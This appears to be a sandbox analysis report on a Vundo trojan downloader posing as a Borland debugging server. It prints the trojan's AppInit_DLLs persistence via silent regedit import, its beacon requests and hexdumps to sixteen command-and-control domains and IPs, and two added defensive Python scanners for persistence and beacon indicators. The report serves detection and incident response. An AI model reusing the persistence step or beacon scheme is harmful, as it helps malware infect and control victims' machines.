Analysis Date: 2013-08-27 07:13:46
MD5: 76a3710c8ad85d059462174b83ee0764
SHA1: fc715121515e89ef3185be9275e2801b85a849a9

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text   md5: 859347ea262c1ddd785df4d935a40a11  sha1: 5118b2c2ecb0f0d9e5269de2db5915f0c63fe114  size: 90112
Section _ASM2   md5: 7e8100fae12e674085dd00b4fcf96f47  sha1: 8ddb457f26b7d001eceae20fe39f22bbcfd582f6  size: 62464
Section .rdata  md5: 5be8eeb9fca386416f85ea22499ceea0  sha1: 727790a1b349b756866dec182b860ae1ac42c56c  size: 7680
Section .data   md5: 2767189675229ebbbf795a730d76f5ec  sha1: b7e9bb7beee752a0c5ef176560de12e1ae9a1c4e  size: 5120
Section .tls    md5: bf619eac0cdf3f68d496ea9344137e8b  sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5  size: 512
Section .rsrc   md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28  sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788  size: 17920
Timestamp: 2012-09-18 20:32:43
Version info:
  LegalCopyright: Copyright © Borland Software Corporation 1990, 2001
  InternalName: BORDBG61
  FileVersion: 70.08.08.1442
  CompanyName: Borland Software Corporation
  ProductName: Borland Remote Debugging Server
  ProductVersion: 51.00
  FileDescription: Borland Remote Debugging Server
  OriginalFilename: bordbg61.exe
Packer: Microsoft Visual C++ ?.?
PEhash: 96d5eb0902d5e1a03adc8ac7b1a6d8be8e91e4b8
AV (avg): Generic29.BLEL
AV (msse): TrojanDownloader:Win32/Vundo.J

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

Registry: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Old WorkAreas\NoOfOldWorkAreas ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021494-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\ProgramsCache ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\NetCache\AdminPinStartTime ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories\{00021493-0000-0000-C000-000000000046}\Enum\Implementing ➝ NULL
Registry: HKEY_CURRENT_USER\SessionInformation\ProgramCount ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\SysTray\Services ➝ 31
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify\PastIconsStream ➝ NULL
Creates File: \Device\Afd\Endpoint
Creates File: C:\WINDOWS\system32\jyyvabj.dll
Creates File: C:\Documents and Settings\Administrator\Cookies\cf
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes File: C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Process:
Creates Process: C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates Mutex: Shell.CMruPidlList
Winsock DNS: 91.233.89.106
Winsock DNS: clickbeta.ru
Winsock DNS: denadb.com
Winsock DNS: terrans.su
Winsock DNS: nsknock.com
Winsock DNS: tryatdns.com
Winsock DNS: clickclans.ru
Winsock DNS: denareclick.com
Winsock DNS: gleospond.com
Winsock DNS: fescheck.com
Winsock DNS: instrango.com
Winsock DNS: tegimode.com
Winsock DNS: netrovad.com
Winsock DNS: nshouse1.com
Winsock DNS: foradns.com
Winsock DNS: getavodes.com
Winsock DNS: clickstano.com

Process
↳ Pid 836

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Registry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝ C:\WINDOWS\system32\jyyvabj.dll\\x00 (the trailing \x00 is the REG_SZ string terminator as the sandbox printed it, not part of the path)
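The persistence step above is the one that matters for response: the sample (whose version resource poses as Borland's bordbg61.exe while the packer check says Visual C++) drops jyyvabj.dll into system32, writes a .reg file, imports it silently with regedit.exe /s so that AppInit_DLLs points at the DLL, and then deletes both temp files. The Python below is an added example written for this page, not code from the report or from the sample, that parses a .reg file and flags values landing on well-known persistence locations. The .reg content is reconstructed from the command line and the resulting value shown above, since the file itself is not in the report; the WATCHLIST of locations is the editor's own selection.

```python
import re

# Constructed sample: the report shows the regedit.exe /s command line and the
# resulting AppInit_DLLs value, but not T03emp03.reg itself (it was deleted after
# import), so this file content is reconstructed from those two facts.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"="C:\\WINDOWS\\system32\\jyyvabj.dll"
'''

# Persistence locations to alert on: (key path suffix, value names or None for any).
# Editor's selection, not something the report enumerates.
WATCHLIST = [
    (r"\Microsoft\Windows NT\CurrentVersion\Windows", {"appinit_dlls", "loadappinit_dlls"}),
    (r"\Microsoft\Windows\CurrentVersion\Run", None),
    (r"\Microsoft\Windows\CurrentVersion\RunOnce", None),
    (r"\Microsoft\Windows NT\CurrentVersion\Winlogon", {"shell", "userinit"}),
]

_VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")=(.*)$')


def _unescape(s):
    # .reg string syntax escapes backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg(text):
    """Parse .reg text into {key: {value_name: value}}.

    String values are unescaped, dword: values become int, "=-" (delete value)
    becomes None, and hex/hex(n) values are kept verbatim.
    """
    text = text.lstrip("\ufeff")          # regedit exports UTF-16 with a BOM
    keys, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lstrip("-")   # "[-KEY]" deletes the key; still record it
            keys.setdefault(current, {})
            continue
        m = _VALUE_LINE.match(line)
        if not m or current is None:
            continue
        name_tok, raw = m.group(1), m.group(2).strip()
        name = "@" if name_tok == "@" else _unescape(name_tok[1:-1])
        if raw.startswith('"') and raw.endswith('"'):
            value = _unescape(raw[1:-1])
        elif raw.lower().startswith("dword:"):
            value = int(raw[6:], 16)
        elif raw == "-":
            value = None
        else:
            value = raw
        keys[current][name] = value
    return keys


def scan_reg(text):
    """Return every value in the .reg text that lands on a WATCHLIST location."""
    findings = []
    for key, values in parse_reg(text).items():
        for suffix, names in WATCHLIST:
            if not key.lower().endswith(suffix.lower()):
                continue
            for name, value in values.items():
                if names is None or name.lower() in names:
                    findings.append({"key": key, "name": name, "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_reg(SAMPLE_REG):
        print(f"PERSISTENCE {f['key']} :: {f['name']} = {f['value']!r}")
```

On Windows XP (the beacon reports os=5.1.2600.3) any DLL listed in AppInit_DLLs is loaded into every process that loads user32.dll, so the dropped DLL ends up inside Explorer, the browser and most GUI security tools alike; on Vista and later LoadAppInit_DLLs must also be 1, and Windows 8 and later disables the mechanism when Secure Boot is on. Because the .reg file is deleted right after import, the artefacts left on a victim are the registry value itself, the regedit.exe /s command line in process-creation logs, and jyyvabj.dll in system32.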

Network Details:

DNS: gleospond.com, Type: A ➝ 91.220.35.154
DNS: getavodes.com, Type: A ➝ 91.220.35.154
DNS: tryatdns.com, Type: A ➝ 62.116.143.15
DNS: fescheck.com, Type: A ➝ 62.116.143.15
DNS: denadb.com, Type: A ➝ 208.73.210.203
DNS: foradns.com, Type: A ➝ 208.73.210.202
DNS: nshouse1.com, Type: A ➝ 208.73.210.203
DNS: instrango.com, Type: A
DNS: netrovad.com, Type: A
DNS: nsknock.com, Type: A
DNS: terrans.su, Type: A
DNS: tegimode.com, Type: A
DNS: clickstano.com, Type: A
DNS: denareclick.com, Type: A
DNS: clickbeta.ru, Type: A
DNS: clickclans.ru, Type: A
HTTP GET: http://gleospond.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2GWEpswZftF3
User-Agent: (none sent)
HTTP GET: http://getavodes.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2KNZFlgNCD6S
User-Agent: (none sent)
HTTP GET: http://tryatdns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2AAeHOkSkSgd
User-Agent: (none sent)
HTTP GET: http://fescheck.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2OO0Nx6jrf4a
User-Agent: (none sent)
HTTP GET: http://denadb.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2PdYaH3N0hop
User-Agent: (none sent)
HTTP GET: http://foradns.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2L6vMC0xJQa/
User-Agent: (none sent)
HTTP GET: http://nshouse1.com/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2JR4qnX7XtN3
User-Agent: (none sent)
HTTP GET: http://91.233.89.106/phpbb/get.php?id=C059900AEA75E06F000ACD20E60C0000&key=1703&av=0&vm=0&al=0&p=266&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWygzBy3Y376hjnjC2g+tC6Hf8r8NPyPJPs2HlBQcYGnWyc
User-Agent: (none sent)
Flows TCP: 192.168.1.1:1031 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1032 ➝ 91.220.35.154:80
Flows TCP: 192.168.1.1:1033 ➝ 62.116.143.15:80
Flows TCP: 192.168.1.1:1034 ➝ 62.116.143.15:80
Flows TCP: 192.168.1.1:1035 ➝ 208.73.210.203:80
Flows TCP: 192.168.1.1:1036 ➝ 208.73.210.202:80
Flows TCP: 192.168.1.1:1037 ➝ 208.73.210.203:80
Flows TCP: 192.168.1.1:1038 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733247 57457073 775a6674 46332048   Ps2GWEpswZftF3 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6c656f73 706f6e64 2e636f6d 0d0a0d0a   leospond.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324b 4e5a466c 674e4344 36532048   Ps2KNZFlgNCD6S H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   65746176 6f646573 2e636f6d 0d0a0d0a   etavodes.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733241 4165484f 6b536b53 67642048   Ps2AAeHOkSkSgd H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2074   TTP/1.1..Host: t
0x000000e0 (00224)   72796174 646e732e 636f6d0d 0a0d0a0a   ryatdns.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324f 4f304e78 366a7266 34612048   Ps2OO0Nx6jrf4a H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   65736368 65636b2e 636f6d0d 0a0d0a0a   escheck.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733250 64596148 334e3068 6f702048   Ps2PdYaH3N0hop H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0d0a0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324c 36764d43 30784a51 612f2048   Ps2L6vMC0xJQa/ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0a0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   5073324a 5234716e 58375874 4e332048   Ps2JR4qnX7XtN3 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a206e   TTP/1.1..Host: n
0x000000e0 (00224)   73686f75 7365312e 636f6d0d 0a0d0a0a   shouse1.com.....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733248 6c425163 59476e57 79632048   Ps2HlBQcYGnWyc H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         
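The eight requests above follow one template: the same /phpbb/get.php path, the same query parameters (only the last characters of hash= differ per host), no User-Agent header (the raw requests carry only Host), and a walk through every resolved domain before falling back to the bare IP 91.233.89.106. The Python below is an added example for this page, not code from the report or from the sample: it decodes the first Raw Pcap dump back into bytes, parses the HTTP request without URL-decoding (so the base64-looking hash keeps its '+' and '/'), and scores the request against those indicators. The sample dump is copied from the report; note that the sandbox masked part of the id value with X's in the dump while printing it unmasked in the HTTP GET list, so a signature keyed on the full id should use the unmasked form. The report does not say what av, vm and al mean; the names suggest antivirus, virtual-machine and elevation flags, which is an inference.

```python
import re

# Constructed sample: the first "Raw Pcap" dump from this report, copied verbatim.
# The sandbox masked part of the id value with X's before publishing the dump.
SAMPLE_HEXDUMP = """\
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d31 37303326   XX0000&key=1703&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323636 266f733d 352e312e 32363030   =266&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   5779677a 42793359 33373668 6a6e6a43   WygzBy3Y376hjnjC
0x000000b0 (00176)   32672b74 43364866 3872384e 5079504a   2g+tC6Hf8r8NPyPJ
0x000000c0 (00192)   50733247 57457073 775a6674 46332048   Ps2GWEpswZftF3 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2067   TTP/1.1..Host: g
0x000000e0 (00224)   6c656f73 706f6e64 2e636f6d 0d0a0d0a   leospond.com....
0x000000f0 (00240)
"""

BEACON_PATH = "/phpbb/get.php"
BEACON_PARAMS = {"id", "key", "av", "vm", "al", "p", "os", "z", "hash"}
IP_LITERAL = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?$")
WINDOWS_BUILD = re.compile(r"^\d+\.\d+\.\d+(?:\.\d+)?$")


def decode_hexdump(text):
    """Turn 'offset (dec)   hex groups   ascii' lines back into the raw bytes."""
    out = bytearray()
    for line in text.splitlines():
        cols = re.split(r"\s{3,}", line.rstrip())   # columns are separated by 3+ spaces
        if len(cols) < 2 or not cols[0].startswith("0x"):
            continue                                 # blank line or the empty final offset line
        out += bytes.fromhex(cols[1].replace(" ", ""))
    return bytes(out)


def parse_query(query):
    """Split a query string on & and = without percent- or plus-decoding, so
    base64-style values such as hash= keep their '+' and '/' characters."""
    params = {}
    for pair in query.split("&"):
        if pair:
            name, _, value = pair.partition("=")
            params[name] = value
    return params


def parse_http_request(raw):
    """Parse the request line and headers of one HTTP/1.x request."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    path, _, query = target.partition("?")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "query": parse_query(query),
            "version": version, "headers": headers}


def beacon_indicators(req):
    """Indicators taken from the eight requests in this report."""
    q, h, hits = req["query"], req["headers"], []
    if req["path"] == BEACON_PATH:
        hits.append("path is " + BEACON_PATH)
    if BEACON_PARAMS <= set(q):
        hits.append("query carries the full id/key/av/vm/al/p/os/z/hash set")
    if "user-agent" not in h:
        hits.append("no User-Agent header")
    if WINDOWS_BUILD.match(q.get("os", "")):
        hits.append("os= is a Windows build string: " + q["os"])
    if len(q.get("id", "")) == 32:
        hits.append("id= is a 32-character host identifier")
    if IP_LITERAL.match(h.get("host", "")):
        hits.append("Host header is a bare IP: " + h["host"])
    return hits


def analyze_hexdump(text):
    req = parse_http_request(decode_hexdump(text))
    return {"host": req["headers"].get("host"), "query": req["query"],
            "indicators": beacon_indicators(req)}


if __name__ == "__main__":
    result = analyze_hexdump(SAMPLE_HEXDUMP)
    print(result["host"], result["query"]["id"], result["query"]["os"])
    for hit in result["indicators"]:
        print(" -", hit)
```

For network detection the stable parts are the path, the parameter set and the absent User-Agent; the hash tail and the Host change on every request, and the domain list is long (sixteen names, of which only seven resolved during the run), so matching on the template rather than on individual hostnames survives domain rotation. The two resolved IPs shared by multiple names (91.220.35.154 and 62.116.143.15) are the better blocking pivot.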


Strings